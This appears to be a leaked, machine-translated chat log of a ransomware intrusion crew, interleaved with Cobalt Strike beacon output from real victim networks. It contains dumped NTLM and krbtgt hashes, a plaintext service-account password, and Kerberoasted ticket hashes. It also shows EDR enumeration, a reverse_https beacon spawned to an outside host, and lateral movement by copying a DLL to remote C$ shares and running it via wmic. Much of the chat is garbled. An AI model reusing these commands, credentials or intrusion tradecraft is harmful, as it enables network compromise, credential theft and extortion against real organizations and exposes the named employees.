7536 Leslie.Avalos bb18284f17ae35e24f1507964a20c01d 512
2333 ACCT350-PC1$ 786b9ccb9685b509d4ccba7a3caa128e 4096
2637 bernardo.soto d2633be354cbf2c6c9327bea488a1698 66048
3622 SACCT116-PC$ 5e90f42ef2ef3c3f8900cc31f259f9b9fe34 4096
12122 Chris.Brown d2633be354cbf2c6c9327bea488a1698 66048
7337 merlyn.gonzalez 4c3879fef394fa5dce0037c197c70841 512
5142 training d2633be354cbf2c6c9327bea488a1698 66048
7546 kimberly.palma fa7a1717c1477d70b45152cc92db284c 512
2126 tony.aguayo d2633be354cbf2c6c9327bea488a1698 512
6151 ACCT410-PC$ 0cad6bf0673b2387a3c9babe1773d173 4096
12133 LEGALTICKETS$ cd1f405d4ca566aced322f382d3344ae 4096
3336 LV_SANDRAM$ 7acfe13f3d7bb767f4bacc834fed00c4 4096
7506 Adrienne.Moran 971eff2411f9cf98bf5f8d31351176d6 66048
3166 ACCT325-PC$ 2f52c971070b641950418e804b04e8e0 4096
6129 SACCT104-PC$ fc5471fd649502695d6ce2df138678b0 4096
7110 ACCT408-PC$ 5f5683625982eae081fa5171f58c1211 4096
1716 ACCTB176-PC$ e449cf83d093b7abd61619f24d0b9cd1 4096
3164 JIMILAPTOP-PC$ 0c141c9d492b72835c688b145ea7834e 4096
6195 ACCT352-PC$ 6afd84560fafc6a08fab7b2c257ebf6b 4096
6111 ACCT368-PC$ 069c57aa53dd5fd6e6ff29ee80efe9cd 4096
3636 SACCT127-PC$ a57cdd795f1c18e67067fb30e11aae48 4096
3210 SACCT103-PC$ d7739490032cbbf2ca03212ae0de32c2 4096
1245 sandra.movius bb08e25d1bd4ea07b24e89b757a1fa01 66048
13107 CASEYCOVELLO$ 4dd8a8e964d8a90fe6200931ba1581 4096
3338 DESKTOP-FMESA9L$ 84e13173788accaf8e22cc0fd88f4a0c 4096
2428 SABRINABUKSH$ 2ff1c899af5f799a45ed48724888d5be 4096
1735 ACCT210-PC$ 16c51d5eca5062ea78a66eb47fc1774b 4096
2749 rodolfo.estrada d2633be354cbf2c6c9327bea488a1698 512
11114 JIMILTP-2020$ a0f4fc216db761d18b8910656789749a 4096
1151 denise.williams 7c0b1ce7bec19ac52eada89ec4d15668 66048
7525 pamela.hernandez fa7a1717c1477d70b45152cc92db284c 512
7327 Vincent.Velardi d2633be354cbf2c6c9327bea488a1698 66048
500 Administrator 190d7c1850cd42a7197a6bd805f50bc9 66048
``Or lock today) in the domain get + thank youuser7@user7 who else to add? So they flew off on their own)
We haven't worked with them for the last 30 minutes, why did you kill all the sessions? Still disconnected from the domain, and there are no machines in the environment
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2bd07805e537f32fe65cdb7ec1ac64c6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
```
```
	 * Username : bstangea
	 * Domain : RTPCO
	 * NTLM : f13d2f88fdf2a0970db1ece9ce90bc57

Local Group Memberships *iDRAC-Admins *Netmon Users
                             *StorageAdmin *VMWare-Admins
                             *VMWare-Admins-Alloy *VSA_Users
Global Group memberships *VSA_Admins *Test_Alloy
                             *IT *SQL Server Admins
                             *testgroup1 *RTP-Admins_Ent
                             *TestShare *RTP-IT-Admins
                             *Domain Users *O365_Sync
``I just got the second one13 minutes ago 1 flew in. Is there a second one? If it doesn`t come in it means the coba is blocked and 20 minutes ago Kasya can`t see it```.
====== AntiVirus ======

  Engine : Windows Defender
  ProductEXE : windowsdefender://
  ReportingEXE : %ProgramFiles%\Windows Defender\MsMpeng.exe

  Engine : Kaspersky Endpoint Security 10 for Windows
  ProductEXE : C:\Program Files (x86)\Kaspersky Lab\Kaspersky Endpoint Security 10 for Windows SP2\wmiav.exe
  ReportingEXE : C:\Program Files (x86)\Kaspersky Lab\Kaspersky Endpoint Security 10 for Windows SP2\x64\wmi64.exe
I thought it wasn't mentioned out loud,and vindef octo it's clear where avp visit is from.Just if it's related to kasper by any chance? I noticed it later,well kasper[ ](https://mediaeveryone.com/group/1-done-rtpcompany-com?msg=SHJHSBqfenpxjBRxe) it's about?
 3356 576 LockApp.exe x64 1 RTPCO\amcnally
 4120 892 avp.exe
 5244 4120 avp.exe x86 1 RTPCO\amcnally
 4848 892 securityHealthService.exe
 11600 4340 MSASCuiL.exe x64 1 RTPCO\amcnally
``only the cassay process is not red votsimantec and cassayan is still the same```
[+] Determining what EDR products are installed on localhost...
[+] host called home, sent: 57 bytes
[+] SISIPSFileFilter.sys Found
[+] 1 EDR Products Found!
    ======================
    | Vendor Information |
    ----------------------
[+] Symantec Found!
```
```
 4292 892 KaseyaEndpoint.exe
so when you were sitting on 1pc all together and tried to get into the trust it was unsuccessful they clean up anchors, sessions, in general everything they can clean up)[ ](https://mediaeveryone.com/group/saiglobal-com?msg=s4LNHXhgaMfybMpmb) another thing, so even if they brought a cob from outside, pass it on their own what's the point in it?@user8 reread the message above or in the same and stay in the same and from that koba already on the trusts in lycznyetuda fuck the servervot there is a koba from which we have not worked with this domain yet i told you about it and a good thing to try it was necessary to ping from the server where you want a session 1 koba that can get a session and so the question was you do not have a session on the inbound router and you do not get any sessions from anywhere and now you sit on the same server and traffic flies to your domains and other things at this point there sat their IT guys and watched the traffic if you all crowded on one server and each had a session analyze the traffic and cut off segmentsadmins do what?when you raised a fuss in the network the last time we did it for a week, we were scattered across the trusts+[ ](https://mediaeveryone.com/group/saiglobal-com?msg=8gSx7ucdX2qwNQcZS) everyone had active sessions on the cob? and from there to personal spam from the same test .66 so if we from all personal cob were there anyway, maybe it makes sense to try from a cob that we have not touched yet?how copied and to which servers did it have time to run? so mb palyat not dll and koba?) give me a bin i will make another cryptohesh change from rebuildadrecreate, re-cryptadlki chopped av, something will change from re-create?
user1 got a session, from hell got a server, pinged it
pinged the servers that are pinged spread our dlls and run
right? domain where to passI'm also the last one and fuck up here already finale will give you another session if there is a back, pass the user1 - he will spread us across the servers, yes, fucked up.... how did you try? right, while trying to spread it flew away so i understand no one outside the current machine, there are more backs?
our sessions flew off...so far only the dog is getting fucked up :thinking:
if you're pinging the name and catch 100% loss then there is a chance that the server just turned off the replica to the ping command, or fv interfere or other reasons what else do not do? if no yuz - access dendied, user or password wrong immediately do not touch, you're asking about 445, so there is a variant, or you confuse me already?[ ](https://mediaeveryone.com/group/saiglobal-com?msg=XmYaJLHszyi2pttqa) if you read the errors, you won't lock[ ](https://mediaeveryone.com/group/saiglobal-com?msg=Z5zKpqTJrL9hpr8S5) if you get a dns request that he does not see the name, how do you even want to interact?
net use with the credentials?
I can't ping 10.225.10.200, it's datacenter.local, how do I even communicate with it?
Just to be clear.
```
beacon> portscan 10.225.10.200 445 icmp 1024
[*] Tasked beacon to scan ports 445 on 10.225.10.200
[+] host called home, sent: 93245 bytes
[+] received output:
Scanner module is complete
?and 445 is open? if the domain is not pinged is it possible to remove something from it? in all other we have? above file update visible trastnu if visible by itself it is already possible but it is pinged and possible so if c360 in quarantine, is there any sense to go to it? do not kill this live?
make_token saig.frd.global\svc_actifio B0b@f3tt
```saig.frd.global\what domain is it? is it not active (can we make tickets from one domain to another? you should check when it has a pass) and is it enabled?
```
502 krbtgt 21dbd0c360e58ac61e4ae83052f1c582 514
```
what can we do about it?
Remind me please) other domains will be here soon and they started in orderdxink was taken on tuesday
took a user who has not changed the password since last month in the start domain (just checked), and in c360 apparently changed the password))) they will not just sit and wait)[ ](https://mediaeveryone.com/group/saiglobal-com?msg=ZDZp8BjrNibbDXpfF) logically, since the admins knew about us full flight we changed passwords from DAudal ad_user above plesloknet through shell dir \faque.rex\C$ if you check the validity of the user it will not lock in case of what? fuck the user did not finish downloading in legalco and c360 also can not get not only him well they obviously felt the fuck and closed the data center from here and got@user8 from yesterday in the domain?
beacon> shell nslookup 10.225.10.200
[*] Tasked beacon to run: nslookup 10.225.10.200
[+] host called home, sent: 53 bytes
[+] received output:
*** Request to UnKnown timed-out

DNS request timed out.
    timeout was 2 seconds.
Server: UnKnown
Address: 10.225.12.200

DNS request timed out.
    timeout was 2 seconds.

The old one should not be overwritten. It would be a good idea to update hell info on the current domainscheknitednsync pinged as well as c360 and almost everything in quarantine13 instead of 19)``
dn:CN=datacenter.local,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2018/06/08-09:59:39 Eastern Daylight Time
>name: datacenter.local
>securityIdentifier: S-1-5-21-3425310730-2254951293-3528185534
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: datacenter.local
>trustType: 2 [UpLevel(2)
>trustAttributes: 4 [Quarantined-Domain(4)]

dn:CN=datacenter.local,CN=System,DC=frd,DC=global
>whenCreated: 2018/04/13-09:59:37 Eastern Daylight Time
>name: datacenter.local
>securityIdentifier: S-1-5-21-3425310730-2254951293-3528185534
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: datacenter.local
>trustType: 2 [UpLevel(2)
>trustAttributes: 8 [Transitive(8)]
Why? Yesterday @user8 was working with him how long ago, there were sessions in the dc? @tl1 Well what is it? Maybe just datacenter? There are no others, in fact it turns out the same places from where last time you hit?
beacon> shell ping datacenter.local
[*] Tasked beacon to run: ping datacenter.local
[+] host called home, sent: 52 bytes
[+] received output:
Ping request could not find host datacenter.local. Please check the name and try again.

beacon> shell ping 10.225.10.200
[*] Tasked beacon to run: ping 10.225.10.200
[+] host called home, sent: 49 bytes
[+] received output:

Pinging 10.225.10.200 with 32 bytes of data:
Request timed out.
Request timed out.

[+] received output:
Request timed out.

[+] received output:
Request timed out.

Ping statistics for 10.225.10.200:
    Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),


``AUSYDHC-ESP-DC1.legalco.holasal guys pinging it can be worked with via bind_pipe or other tulamia I remember that some domain is completely closed from outside in terms of sessions
looking for faerai admin... if you can't find it there is an alternative solution but not very good...
Theoretically our .exe can even go under it, but it's a lottery and the chances are not in our favor.

@user3 from other domains that guys are now sitting in - also past? legalco.local servers and the domain is not pinged if you fuck with it directly))))) well and dll is technically mmm binary too)so disable like sofos? final binaries)dll of the binaries?it will kill our binary processes and drop them from the network before it worked quietly and it's not much of a hindrance. the main problem i see is the phaea agents i mentioned above
looking for techs, avers, backups.
everything is standard, we just need to "finish" to the mind what we have here by tasks? ok and then already portskankilni dllkuvinlogon then my borders in the process do dllkoy datacenter here i'll take a global, dellkoy make datacenter myself and from there portskankinu fuck, ok? tolerable
it's not worth it to multiply connects and move around...how gentle is portscan? @user1 we're trying to be gentle, see how cobalts fly off...ok now we'll work with user3 in user7's coba, pinging user3's coba is 100% loss before you pass it on others - ping out gently
icmp won't be an alert probably if https connect is flashed
the only way to get out is by pinging, right then and there. you also blocked me from the user3 coba the other day it's not even trying to get your coba into that network anymore. you andpacific probably you're not a big deal. work with someone else's coba, you can't get into my coba.204 from the session saig.frd.global pinged myself (firedi.com) and got loss 100%very carefully
in datacenter no abrupt moves and move "within" the domain, only from the entry point and gently, ok jump through others who do not see the domain
all so far I'm not even talking about beacons - it's by itself, we don't know yet where the datacenter runs.... is datacenter.local - highest priority+@user1 @user3 confrm please+947ya+94ya+9ya +everyone understands what exactly needs to be prepared and find out?
[*] Tasked beacon to spawn (x86) windows/foreign/reverse_https (regbest.com:443)
``minutes to regbest.com:443
from there we'll take it apart++ can we pass it on to the right trusts yourself?
here in this domain i have bek checking bek, if off - today we'll take on other thingsWill the others? i have datacenter sagged for 34 hours, saiglobal for 20 no one in the whole forest has a session left, right? passloft.com +stormname.com:443 pass me[ ](https://mediaeveryone.com/group/saiglobal-com?msg=4feA2KDB6sntzrit2) + firedi.com:443
it's from a subdivisionMail espreon.com passloft session at slypad.com:443@user3 your subjective opinion is it some kind of separate company or just a "department" legal ?
what are the as_users mail there ? legalco.local
for adusers 1181 i need all the data we have on domain administrators and network engineers
browsers/notes/documentation/kipasses/graphics - anything you think is at least relatively relevant and less than 4 years old@user7 similarly for users and cars@user9
look for virtualization servers, identify key techies in your domain (sysadmins, etc.) and look for their machines.[ ](https://mediaeveryone.com/group/saiglobal-com?msg=PzM6WCqTSMCZj5zC5) c360.local
1. windef(couldn't find more entries, but need to check)
2. categorized
4. No
all servers are spinning on wm, including both dksaiglobal tozhen standatd 6k users, the rest (which I worked on) much less at my datacenter dead@user8 scan more ranges of your domain at 80/443/445 for machines that are not part of the domain (NAS probably here - they are outside the domain too) the key domain - datacenter where we close the server segment is fireeye which today we need to solve a SERIOUS problem who works with large major domains with a large number of users - write me fine, deal with it thenall you said in the plan i'll scan everything, it's just that from my coba i couldn't get into the hr...za... the other day in general, the session to get, from there could not ping myself, worked from koba @user3 , now go there, long loading its destination) name of the domain datacenter as if hinted at) yes, already looked it uhm "egress routes" such if you can call it that)[ ](https://mediaeveryone.com/group/saiglobal-com?msg=t7hMZEWZmvZG3dnpy) more, there are everywhere server windup simple
you need to see if "other" servers are visible from where the losses from these two-servers of the same group usually see each other, even if part of the group is closed to the rest of the segmentUSHDC1-CSPWEB18.datacenter.local
	USHDC1-CSPWEB22.datacenter.localBut there is a server with this prefix, which is in the visibility areaUSHDC1-CSPWEBYou do not see in the routes mostly servers with the prefix now look. magic if so - see what's on the file system and what data are on the drives + list of processes of servers in this group to form a correct impressionI guess you just switched the concept of NAS as a file storage?
occasionally
Very occasionally.
but it would be a neutered sevens or something like that in terms of identificationPresumably nas:
A ridiculous assumption, no offense. us - aka NAS - Network Attached - Storage.
NEVER identified as windows server 2012 I take it we are everywhere windup ? the hardware may not let icmp packets through but it does let various administration systems through100% Loss: - most likely behind the hardware, scan them to 80/443/3389/5900will see - I'll tell you what the tascii full domain compositiondatacenter.local is one of the key domains with critical data.
Download the categorization of datacenter.local
1. FireEye, Windows Defender
2. The categorization is
3. no we just need to collect this information, we need to find it in the logs/reports Please write back on your domains we are working with 1 - Is anti-virus/edr identified in all the domains?
2 - Did you categorize server systems by purpose in all domains?
3 - Did you find the main segment where sysadmins and network-engineers are sitting? Let's do a quick walkthrough here
we need to decide if we're ready for the final phase of the problem with the network again the emphasis on the winlogon last output from winlogon not in the other to the swhost, in winlogon passed on one machine shot in swhostehere local users gives hashdump and in the mime hash computer and not a single userа it does not migrate thereа you shoot from winlogon? somewhere so gives out `` ``
beacon> hashdump
[*] Tasked beacon to dump hashes
[+] host called home, sent: 82501 bytes
[+] received password hashes:
[-] no results
```
```
beacon> logonpasswords
[*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command
[+] host called home, sent: 438866 bytes
[+] received output:
ERROR kuhl_m_sekurlsa_acquireLSA ; Key import
``Priority on the host win-server by other hochuchek la current on tachkada unlikely it is castrated, most likely AB does not givehashdumps with mimic does not givev system processes not injctctitated some lA goes out got where tried above that i dumped was oldmag, already out newer i built the concatenation you dumped today i will build clean dllskin x64dll dirty no, as a matter of fact, there is no problem, i do not have any problem with it, i don`t have any problems with it`` ``.
beacon> shell copy x64.dll \139.62.166.164\C$\ProgramData
[*] Tasked beacon to run: copy x64.dll \\139.62.166.164\C$\ProgramData
[+] host called home, sent: 75 bytes
[+] received output:
        1 file(s) copied.

beacon> shell wmic /NODE:139.62.166.164 process call create "rundll32 C:\ProgramData\x64.dll entryPoint"
[*] Tasked beacon to run: wmic /NODE:139.62.166.164 process call create "rundll32 C:\ProgramData\x64.dll entryPoint"
[+] host called home, sent: 121 bytes
[+] received output:
Executing (Win32_Process)->Create()

Method execution successful.

Out Parameters:
instance of __PARAMETERS
{
	ProcessId = 8008;
	ReturnValue = 0;
};


beacon> shell dir \139.62.166.164\C$\ProgramData\x64.dll
[*] Tasked beacon to run: dir \139.62.166.164\C$\ProgramData\x64.dll
[+] host called home, sent: 74 bytes
[+] received output:
 Volume in drive \139.62.166.164.\C$ is Windows
 Volume Serial Number is FC53-858D

 Directory of \139.62.166.164.164\C$\ProgramData

File Not Found
``Well, get into other hosts where you're admin>> I can tell you that we sat idle for a month, and I remember it only about Remote Admin= )tell me that the first time I heard that):man_facepalming::thinking:your polzak there local admins can check there rps requests if your polzak see shara admin$$ in the course, yes?and why go there?) and there is nothing interesting all the same I on a few machines in the admin's balloon came `` ``
Shares for COB-65749:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$
``````
Shares for COB-65749:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares
XDSPVSSERV05 what's your current drive? I'm browsing through SharpShares now, nothing particularly interesting I've found so far, what have you done in general or in the last +- hour?
beacon> psinject 15344 x64 Invoke-Kerberoast -domain itstest.ad | fl
[*] Tasked beacon to psinject: Invoke-Kerberoast -domain itstest.ad | fl into 15344 (x64)
[+] host called home, sent: 133723 bytes
[+] received output:


TicketByteHexStream :
Hash : $krb5tgs$AgpmServer/itstestagpm1.itstest.ad/itstest.ad:F36D0ED4DAD5337B355F1
                       799B1427DCE$AFC717D0BC99ADE1B19A00A08514D3D2509980A20AA2D05FB2F50E7D7A8B479B
                       58C1E1BB63210A696E873E1ED529D2B4785D006DDAAACC1A0EA81760B7154509B730F3F51EAC
                       B6F19C08DF1D1F661987DFFD0CD355259527BAD8B5B5236E635C3ACBCD535F14ACFEE4C07B27
                       BA701059DFF0D164F720AC83B0EFD794C41AC644B500D35FE40E3160EAAE778ABDFB2BB25220
                       5C861D689CCB16F5507433C3850461BD5B78D7833F716DE6173ADE9FC7A695B276F69002690F
                       85D7F99F71363FADC8AA09D5A64108DDF23BAAB01BE7D0F3CF84BEBF40001B2A0B83B61689D4
                       8831EB8B22174FD57CA2D6BBF5380244F37D3888B48906627123D955F9FB8A1C8ADB7EC365C5
                       239F07479B497AE5DDD13CB81908E117B6E2A3DD4A232276AAFA7D31E96718FE361358F3F96A
                       F4815509FAAA1E2BC6F55BB0D240B82C05F7B1F164589F6F36395DDAEA6F27B817A879D60814
                       EBD0AB159E7C73F8C43B17714145CFE29B2A35FFB7B516859C8B3810621BC82624313721A764
                       602AB009E9626D8FD3D6CF9CED5CD7CDB827C3E18E9DB463AA3C4508A950BF3A7C179BFC9998
                       A4986B4906AC320E5037D0DDC3F24D3879E3CF726A6AA3ACE75C3B91F1558035D7222DBDF8FD
                       E1E450BA001C4DB078F55BC88802CB13743730E8C62F075166442A54EEDE8754C3917F3ED042
                       B7B2E09413463F50CECB7C54766C9CCB407A6B47C817BC9A792ABA32822C9169B0AB720A7889
                       CE3E0966D26AC702A24D816BEA8A5BDEED2E5338445586E877D61FE1EED5FF8AB29D1F19EADB
                       0A56F3E2A565C53E06C6BE5F43AD498AF9ACB837D00EFC91989B5147BA7D02488FB6B4792F48
                       166DC02D1A7FB9D61E236B23B4872EA726DC95DD4657034569105167334B7200627AE7AFA71D
                       271E8D448BC7918B1D70FCD63442E2303DA1BBFB6AA16455DF1ECC827D821DB3271BEA2EF75D
                       30B6051E2CE32C1CBB15D4A161F3E69576D667FB6D9C9B443D3DB4EA64A253A6140B466CDF5E
                       F6DDD022E765CD7820DD6AA0247014A7E2EDC4AE1E878A5F9B18E72E41D5A2A761C58E023D89
                       8925694FCD5DA99C3144C061E33E52A8955B04FF0535CBBC02302CDDFC11D8BF83AA91D8EE01
                       C42477EB39C093A39ACDA4DEC3163F35974111A7A825E37E759CFC3F6A32FFCAEC257AC431B5
                       BC812F2E4DB5DE3EE85B94816C5ED40EB18EE85AE6680E08E97D72ADB603D9B7611FEB9406EF
                       EB0D3384BAA6BCFBEF4EA8124FA2C3D368B0E33A01E10E8E188FA76DDA33188330A38723291C
                       B598FC853236E35FED6676C8C29134581E89D072FD4E55EA119229111C0319ABF4A96E662EF6
                       AC855DBCAB73E33BF02D2DB245883788B05CEF1950A855640918443EF279AE3D74CBA29F1B59
                       D973AE398CAE2A8AC3A4D60989EDC6801C43048F5F7F9D5734A71E4B6E428CB55D8A55CF1103
                       F022DC53B6043AEE712D3F24679DC42F9B8DEFF767E1E6D22FE8824E17B70180F34C55F513FA
                       74AB8AD42D69438A9CBAFCEB77B22D38F64D9870B6ED8407FCFA0781F8768EC7692F28BC3B89
                       17240AC5AC389A8AF6001E1917D8088D14B102FCE13890B97797EA223C7C8740FC81B346E001
                       A567DC1BA4B7B2F26A49AA360A0C70F747693C99E7E9D1C393971662DA1DED0FA6E1FA1887AF
                       FA19958885222E490C03243F87D5A240119987548B61482E0AC527E4517220564D393ACE1B12
                       CF9F37FBE724653CE470E01ABDF2B386940CF284E9C028AFA3BBD6003AEABFD154F9861945BD
                       F1AE753DB8BDDDB16F0B9D4DA8A7D2CF08AB604CB49E0333573EFEF134268ABEEE9D8AD9009A
                       F3
SamAccountName : agpm-sa
DistinguishedName : CN=AGPM SA,OU=Users,OU=ITSTEST,DC=itstest,DC=ad
ServicePrincipalName : AgpmServer/itstestagpm1.itstest.ad/itstest.ad

WARNING: [Get-DomainSPNTicket] Error requesting ticket for SPN 'FIMService/ITSTESTFIM.itstest.ad' from user 'CN=FIMService,OU=Service Accounts,DC=itstest,DC=ad' : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were unable to create a Kerberos credential, see inner exception for details".
TicketByteHexStream :
Hash : $krb5tgs$AgpmServer/itstestagpm1.itstest.ad/itstest.ad:F36D0ED4DAD5337B355F1
                       799B1427DCE$AFC717D0BC99ADE1B19A00A08514D3D2509980A20AA2D05FB2F50E7D7A8B479B
                       58C1E1BB63210A696E873E1ED529D2B4785D006DDAAACC1A0EA81760B7154509B730F3F51EAC
                       B6F19C08DF1D1F661987DFFD0CD355259527BAD8B5B5236E635C3ACBCD535F14ACFEE4C07B27
                       BA701059DFF0D164F720AC83B0EFD794C41AC644B500D35FE40E3160EAAE778ABDFB2BB25220
                       5C861D689CCB16F5507433C3850461BD5B78D7833F716DE6173ADE9FC7A695B276F69002690F
                       85D7F99F71363FADC8AA09D5A64108DDF23BAAB01BE7D0F3CF84BEBF40001B2A0B83B61689D4
                       8831EB8B22174FD57CA2D6BBF5380244F37D3888B48906627123D955F9FB8A1C8ADB7EC365C5
                       239F07479B497AE5DDD13CB81908E117B6E2A3DD4A232276AAFA7D31E96718FE361358F3F96A
                       F4815509FAAA1E2BC6F55BB0D240B82C05F7B1F164589F6F36395DDAEA6F27B817A879D60814
                       EBD0AB159E7C73F8C43B17714145CFE29B2A35FFB7B516859C8B3810621BC82624313721A764
                       602AB009E9626D8FD3D6CF9CED5CD7CDB827C3E18E9DB463AA3C4508A950BF3A7C179BFC9998
                       A4986B4906AC320E5037D0DDC3F24D3879E3CF726A6AA3ACE75C3B91F1558035D7222DBDF8FD
                       E1E450BA001C4DB078F55BC88802CB13743730E8C62F075166442A54EEDE8754C3917F3ED042
                       B7B2E09413463F50CECB7C54766C9CCB407A6B47C817BC9A792ABA32822C9169B0AB720A7889
                       CE3E0966D26AC702A24D816BEA8A5BDEED2E5338445586E877D61FE1EED5FF8AB29D1F19EADB
                       0A56F3E2A565C53E06C6BE5F43AD498AF9ACB837D00EFC91989B5147BA7D02488FB6B4792F48
                       166DC02D1A7FB9D61E236B23B4872EA726DC95DD4657034569105167334B7200627AE7AFA71D
                       271E8D448BC7918B1D70FCD63442E2303DA1BBFB6AA16455DF1ECC827D821DB3271BEA2EF75D
                       30B6051E2CE32C1CBB15D4A161F3E69576D667FB6D9C9B443D3DB4EA64A253A6140B466CDF5E
                       F6DDD022E765CD7820DD6AA0247014A7E2EDC4AE1E878A5F9B18E72E41D5A2A761C58E023D89
                       8925694FCD5DA99C3144C061E33E52A8955B04FF0535CBBC02302CDDFC11D8BF83AA91D8EE01
                       C42477EB39C093A39ACDA4DEC3163F35974111A7A825E37E759CFC3F6A32FFCAEC257AC431B5
                       BC812F2E4DB5DE3EE85B94816C5ED40EB18EE85AE6680E08E97D72ADB603D9B7611FEB9406EF
                       EB0D3384BAA6BCFBEF4EA8124FA2C3D368B0E33A01E10E8E188FA76DDA33188330A38723291C
                       B598FC853236E35FED6676C8C29134581E89D072FD4E55EA119229111C0319ABF4A96E662EF6
                       AC855DBCAB73E33BF02D2DB245883788B05CEF1950A855640918443EF279AE3D74CBA29F1B59
                       D973AE398CAE2A8AC3A4D60989EDC6801C43048F5F7F9D5734A71E4B6E428CB55D8A55CF1103
                       F022DC53B6043AEE712D3F24679DC42F9B8DEFF767E1E6D22FE8824E17B70180F34C55F513FA
                       74AB8AD42D69438A9CBAFCEB77B22D38F64D9870B6ED8407FCFA0781F8768EC7692F28BC3B89
                       17240AC5AC389A8AF6001E1917D8088D14B102FCE13890B97797EA223C7C8740FC81B346E001
                       A567DC1BA4B7B2F26A49AA360A0C70F747693C99E7E9D1C393971662DA1DED0FA6E1FA1887AF
                       FA19958885222E490C03243F87D5A240119987548B61482E0AC527E4517220564D393ACE1B12
                       CF9F37FBE724653CE470E01ABDF2B386940CF284E9C028AFA3BBD6003AEABFD154F9861945BD
                       F1AE753DB8BDDDB16F0B9D4DA8A7D2CF08AB604CB49E0333573EFEF134268ABEEE9D8AD9009A
                       F3
SamAccountName : FIMService
DistinguishedName : CN=FIMService,OU=Service Accounts,DC=itstest,DC=ad
ServicePrincipalName : AgpmServer/itstestagpm1.itstest.ad/itstest.ad

WARNING: [Get-DomainSPNTicket] Error requesting ticket for SPN 'host/certauth.testfs.auth.unf.edu' from user 'CN=ADFS2ServiceAcct,OU=Service Accounts,DC=itstest,DC=ad' : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were unable to create a Kerberos credential, see inner exception for details."
TicketByteHexStream :
Hash : $krb5tgs$AgpmServer/itstestagpm1.itstest.ad/itstest.ad:F36D0ED4DAD5337B355F1
                       799B1427DCE$AFC717D0BC99ADE1B19A00A08514D3D2509980A20AA2D05FB2F50E7D7A8B479B
                       58C1E1BB63210A696E873E1ED529D2B4785D006DDAAACC1A0EA81760B7154509B730F3F51EAC
                       B6F19C08DF1D1F661987DFFD0CD355259527BAD8B5B5236E635C3ACBCD535F14ACFEE4C07B27
                       BA701059DFF0D164F720AC83B0EFD794C41AC644B500D35FE40E3160EAAE778ABDFB2BB25220
                       5C861D689CCB16F5507433C3850461BD5B78D7833F716DE6173ADE9FC7A695B276F69002690F
                       85D7F99F71363FADC8AA09D5A64108DDF23BAAB01BE7D0F3CF84BEBF40001B2A0B83B61689D4
                       8831EB8B22174FD57CA2D6BBF5380244F37D3888B48906627123D955F9FB8A1C8ADB7EC365C5
                       239F07479B497AE5DDD13CB81908E117B6E2A3DD4A232276AAFA7D31E96718FE361358F3F96A
                       F4815509FAAA1E2BC6F55BB0D240B82C05F7B1F164589F6F36395DDAEA6F27B817A879D60814
                       EBD0AB159E7C73F8C43B17714145CFE29B2A35FFB7B516859C8B3810621BC82624313721A764
                       602AB009E9626D8FD3D6CF9CED5CD7CDB827C3E18E9DB463AA3C4508A950BF3A7C179BFC9998
                       A4986B4906AC320E5037D0DDC3F24D3879E3CF726A6AA3ACE75C3B91F1558035D7222DBDF8FD
                       E1E450BA001C4DB078F55BC88802CB13743730E8C62F075166442A54EEDE8754C3917F3ED042
                       B7B2E09413463F50CECB7C54766C9CCB407A6B47C817BC9A792ABA32822C9169B0AB720A7889
                       CE3E0966D26AC702A24D816BEA8A5BDEED2E5338445586E877D61FE1EED5FF8AB29D1F19EADB
                       0A56F3E2A565C53E06C6BE5F43AD498AF9ACB837D00EFC91989B5147BA7D02488FB6B4792F48
                       166DC02D1A7FB9D61E236B23B4872EA726DC95DD4657034569105167334B7200627AE7AFA71D
                       271E8D448BC7918B1D70FCD63442E2303DA1BBFB6AA16455DF1ECC827D821DB3271BEA2EF75D
                       30B6051E2CE32C1CBB15D4A161F3E69576D667FB6D9C9B443D3DB4EA64A253A6140B466CDF5E
                       F6DDD022E765CD7820DD6AA0247014A7E2EDC4AE1E878A5F9B18E72E41D5A2A761C58E023D89
                       8925694FCD5DA99C3144C061E33E52A8955B04FF0535CBBC02302CDDFC11D8BF83AA91D8EE01
                       C42477EB39C093A39ACDA4DEC3163F35974111A7A825E37E759CFC3F6A32FFCAEC257AC431B5
                       BC812F2E4DB5DE3EE85B94816C5ED40EB18EE85AE6680E08E97D72ADB603D9B7611FEB9406EF
                       EB0D3384BAA6BCFBEF4EA8124FA2C3D368B0E33A01E10E8E188FA76DDA33188330A38723291C
                       B598FC853236E35FED6676C8C29134581E89D072FD4E55EA119229111C0319ABF4A96E662EF6
                       AC855DBCAB73E33BF02D2DB245883788B05CEF1950A855640918443EF279AE3D74CBA29F1B59
                       D973AE398CAE2A8AC3A4D60989EDC6801C43048F5F7F9D5734A71E4B6E428CB55D8A55CF1103
                       F022DC53B6043AEE712D3F24679DC42F9B8DEFF767E1E6D22FE8824E17B70180F34C55F513FA
                       74AB8AD42D69438A9CBAFCEB77B22D38F64D9870B6ED8407FCFA0781F8768EC7692F28BC3B89
                       17240AC5AC389A8AF6001E1917D8088D14B102FCE13890B97797EA223C7C8740FC81B346E001
                       A567DC1BA4B7B2F26A49AA360A0C70F747693C99E7E9D1C393971662DA1DED0FA6E1FA1887AF
                       FA19958885222E490C03243F87D5A240119987548B61482E0AC527E4517220564D393ACE1B12
                       CF9F37FBE724653CE470E01ABDF2B386940CF284E9C028AFA3BBD6003AEABFD154F9861945BD
                       F1AE753DB8BDDDB16F0B9D4DA8A7D2CF08AB604CB49E0333573EFEF134268ABEEE9D8AD9009A
                       F3
SamAccountName : ADFS2ServiceAcct
DistinguishedName : CN=ADFS2ServiceAcct,OU=Service Accounts,DC=itstest,DC=ad
ServicePrincipalName : AgpmServer/itstestagpm1.itstest.ad/itstest.ad

WARNING: [Get-DomainSPNTicket] Error requesting ticket for SPN 'http/ITSTESTFIM' from user 'CN=FIMAppPoolAcct,OU=Service Accounts,DC=itstest,DC=ad' : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were unable to create a Kerberos credential, see inner exception for details."
TicketByteHexStream :
